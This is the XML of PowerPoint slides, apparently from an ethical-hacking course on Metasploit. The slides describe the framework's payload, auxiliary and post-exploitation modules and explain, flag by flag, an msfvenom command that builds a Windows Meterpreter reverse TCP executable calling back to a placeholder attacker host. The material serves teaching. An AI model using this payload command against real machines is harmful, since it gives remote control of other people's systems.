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86409" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="74" d="100"/>
          <a:sy n="74" d="100"/>
        </p:scale>
        <p:origin x="840" y="77"/>
      </p:cViewPr>
      <p:guideLst/>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="-2845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33117-5401-483C-8938-C5FF4CB045E5}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>13-08-2023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FE45E-6366-4D71-BC36-9050F1D4D0B2}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2921673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FFE45E-6366-4D71-BC36-9050F1D4D0B2}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="245929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FFE45E-6366-4D71-BC36-9050F1D4D0B2}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4388310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transition spd="slow">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ransition spd="slow">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mb/>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mb/>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mb/>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mb/>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ransition spd="slow">
    <p:comb/>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123D1-4351-CF73-D85E-3372A52A6063}"/>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21CB783D-7EEB-8BE9-15B8-84F13D52C15F}"/>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7E843EC6-AF21-1B3B-51C7-6E992B7E7C59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192001" cy="6931152"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="944987627"/>
      </p:ext>
    </p:extLst>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75478C-83A0-DE15-099A-D782689E2D5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="816746"/>
            <a:ext cx="5188367" cy="4974455"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Payload Modules:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Payload modules determine the actions to be executed on a compromised system after a successful exploitation. They allow the attacker to establish and maintain control over the target machine. Payloads can include shellcode, reverse shells, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> sessions, and other malicious code that provide various capabilities such as command execution, file manipulation, and privilege escalation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70E96D74-CE23-D524-5AF9-534C31C9E082}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="248575"/>
            <a:ext cx="5972293" cy="6436310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2807821454"/>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7C09E8-6484-6087-10B0-CB3460C3268F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="790113"/>
            <a:ext cx="9905999" cy="5001088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Auxiliary Modules:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Auxiliary modules in Metasploit perform supporting functions during the penetration testing process. They include a wide range of tools for activities like scanning, fingerprinting, information gathering, and brute-forcing credentials. These modules provide additional functionalities that assist in reconnaissance and vulnerability identification.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Post-Exploitation Modules:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Post-exploitation modules are used to perform actions on a compromised system after gaining access. They allow ethical hackers to maintain control, escalate privileges, collect information, and perform further exploitation. Post-exploitation modules assist in lateral movement within the network and facilitate thorough assessment of the target environment. Like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>eterpreter,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> , Espionage etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRP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1153499962"/>
      </p:ext>
    </p:extLst>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6E2B-00E0-BD2D-BB4F-393677B369FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="4400" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Metasploit Workflow</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="3600" b="1"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692D3F9A-5A08-E770-A548-ABABF1839A30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="2249486"/>
            <a:ext cx="9905999" cy="4106925"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in this part we are going to see how to create a payload in Metasploit and then exploit remote pc with Metasploit frame work.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So first thing is we have to create one payload for that we will use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> previously </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfpayload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> was used but now they removed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfpayload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfencode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and introduced </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> so lets see how to create a payload with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the command is </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f exe -o payload.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="799034867"/>
      </p:ext>
    </p:extLst>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2DC04E-A8F4-96AA-BC99-FA7EAD544F68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="128337" y="208547"/>
            <a:ext cx="11919284" cy="6256421"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="97500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f exe -o payload.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Lets break this command and understand what is happening in the code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Msfvenom:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>This</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> is the command to run the Metasploit payload generator, which allows you to create custom payloads.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="111827"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>-p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="111827"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="111827"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="111827"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="111827"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>This option specifies the payload to be generated. In this case, it's the Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> reverse TCP payload. Meterpreter is a versatile payload used for post-exploitation activities, and the reverse TCP option establishes a connection back to the attacker's machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="111827"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>LHOST=&lt;IP&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Replace IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>with the IP address of the machine where the attacker is running Metasploit. This is the IP address that the compromised system will connect back to.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="111827"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>LPORT=&lt;PORT&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="111827"/>
                </a:solidFill>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Replace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>PORT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>with the port number on which the compromised system will establish the connection. This is the port that the compromised system will use to communicate with the attacker's machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3543181932"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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43AF6-53B5-29FB-826A-2A721C5FDC5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="541421"/>
            <a:ext cx="10972800" cy="5775158"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="111827"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>-f exe:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>This option specifies the output format of the payload. In this case, it's set to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>which will generate an executable file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="111827"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>-o payload.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="111827"/>
                </a:solidFill>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>his option specifies the output file name for the payload. In this example, the payload will be saved as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne Mono"/>
              </a:rPr>
              <a:t>payload.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>This is the created payload which will show in home directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE68227B-0A53-D593-566C-72CADC578196}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2652604"/>
            <a:ext cx="10137991" cy="1566470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
